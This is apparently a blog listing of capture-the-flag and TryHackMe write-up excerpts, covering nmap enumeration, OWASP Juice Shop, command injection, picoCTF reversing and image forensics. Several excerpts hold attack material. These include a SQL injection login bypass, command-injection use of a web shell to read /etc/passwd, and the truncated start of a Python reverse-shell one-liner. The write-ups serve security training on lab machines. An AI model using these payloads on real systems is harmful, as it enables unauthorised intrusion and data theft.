Defalt_

vuln Enumerations Nmap scan Here is the task 2 answers all in this nmap scan. # Nmap 7.91 scan initiated Sun May 30 18:01:18 2021 as: nmap -sV -sC -oN nmap/vuln 10.10.205.62 Nmap scan report for 10.10.205.62 Host is up (0.22s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA) | 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA) |_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3128/tcp open http-proxy Squid http proxy 3.5.12 |_http-server-header: squid/3.5.12 |_http-title: ERROR: The requested URL could not be retrieved 3333/tcp open http Apache httpd 2.4.1...

rick Enumeration Nmap scan result # Nmap 7.91 scan initiated Thu May 27 08:23:53 2021 as: nmap -sV -sC -oN nmap/pickle_rick 10.10.11.26 Nmap scan report for 10.10.11.26 Host is up (0.19s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f7:72:fe:b9:a6:8a:40:99:46:b0:ff:34:50:7a:de:4e (RSA) | 256 0b:0e:f8:1e:d5:aa:89:96:d5:4a:96:de:bd:83:3a:b6 (ECDSA) |_ 256 c2:9a:86:0e:c8:d8:27:6d:c1:b5:40:99:ce:47:92:7a (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Rick is sup4r cool Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu May 27 08:24:37 2021 -- 1 IP address (1 host up) scanned in 43.28 seconds Here we found we have port 80 open. when You go int...

juice Task 1 when you go into the IP you can see juice store. Task 2 Question #1: What’s the Administrator’s email address? click the item on the juice shop and view the review admin@juice-sh.op Question #2: What parameter is used for searching? when you search about a item , You can get the parameter name after the question mark. ( http://10.10.163.117/#/search?q=apple ) q Question #3: What show does Jim reference in his review? His review was the (Fresh out of a replicator.) and search this about google you can get the answer. what is the replicator ? star trek Task 3 Question #1: Log into the administrator account! In this case we need to get to the admin account this will be easy injection. first we need to go to the login page and Type like this: ’ or 1=1-- and password to whatever you like. Here we go now you in the admin account. Task 4 Question #1: Bruteforce the Administrator account’s password! They provide a guideline to do t...

owasp Task 5 : [Severity 1] Command Injection Practical Go to the link mine was a http://10.10.163.167/evilshell.php What strange text file is in the website root directory? (when you use ‘ls’ command in a web shell) drpepper.txt How many non-root/non-service/non-daemon users are there? (You can see them on the passwd file, simply use the command cat /etc/passwd and look for the users) 0 What user is this app running as? (Simply you can use ‘whoami’ command to who is the user) www-data What is the user’s shell set as? (cat the etc/passwd) /usr/sbin/nologin What version of Ubuntu is running? (You can use ‘lsb-release -a’ to watch the version number) 18.04.4 Print out the MOTD. What favorite beverage is shown? (You can ‘cat’ that file like this: cat /etc/update-motd.d/00-header) DR PEPPER Since we can do command injection lets get a reverse shell! /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock...

In a forensic challenge with an image it is common to start with a panel of functions to detect a flag. First of all Exiftool which allows access to the metadata (the additional information of an image) but here we do not get anything very interesting. Strings which allows access to all the legible characters of the image but once again no flag. We can also use another tool to check the layers but the answer lies elsewhere. The solution : By using binwalk we access the signature of the file and we can read that the image is a compressed file under zip. So we can unzip the image and get another image of a smaller doll. You must have understood the reasoning you must unzip the image until you get a text file: the flag.

pico Looking at the keygenme-trial.py Instead of running the script right away, it is best practice to read the source code, right? username_trial = "GOUGH" bUsername_trial = b "GOUGH" key_part_static1_trial = "picoCTF{1n_7h3_|<3y_of_" key_part_dynamic1_trial = "xxxxxxxx" key_part_static2_trial = "}" key_full_template_trial = key_part_static1_trial + key_part_dynamic1_trial + key_part_static2_trial This will be obvious later, next of course the flag! Or here it is called the key. It is comprised of two static parts, and a dynamic part: key_full_template_trial = key_part_static1_trial + key_part_dynamic1_trial + key_part_static2_trial Great… maybe we can have a look at how the dynamic part is generated? Dynamic key To check the validity of the dynamic key, the following function is used : def check_key(key, username_trial): global key_full_template_trial if len ( key ) != len ( ...

pico After the download two files take a look into the bash file . #!/bin/bash echo "Attempting disassembly of $1 ..." #This usage of "objdump" disassembles all (-D) of the first file given by #invoker, but only prints out the ".text" section (-j .text) (only section) #that matters in almost any compiled program... objdump -Dj .text $1 > $1 .ltdis.x86_64.txt #Check that $1.ltdis.x86_64.txt is non-empty #Continue if it is, otherwise print error and eject if [ -s " $1 .ltdis.x86_64.txt" ] then echo "Disassembly successful! Available at: $1 .ltdis.x86_64.txt" echo "Ripping strings from binary with file offsets..." strings -a -t x $1 > $1 .ltdis.strings.txt echo "Any strings found in $1 have been written to $1 .ltdis.strings.txt with file offset" else echo "Disassembly failed!" echo "Usage: ltdis.sh <program-file>" ...

web Task 1,2,3,4 You can read their document carefully and find the answers. You can find two answers by given link on firefox HTTP format page. Task 5 (Mini CTF) Here I will show two methods. Watch my video for visual understanding https://youtu.be/6j4Ghryj0mY Here is the webpage you getting : Burpsuite option Go to the burpsuit and lunch browser then type your machine ip with the port. http://10.10.248.152:8081 this was my IP yours must be changed. select the right HTTP request and press CTRL+R to go to the repeater. Then type your first clue and send it. Then type your second clue after changing the GET to POST request. Then go to the action tab and select url encode as you type and send it. Now we need to get cookie. change first line to the ‘GET /ctf/getcookie’ and send it. Now we need to send cookie. for that we need to change the request to ‘GET /ctf/sendcookie’ and go to the inspector tab and add a cookie. CURL option (TryHa...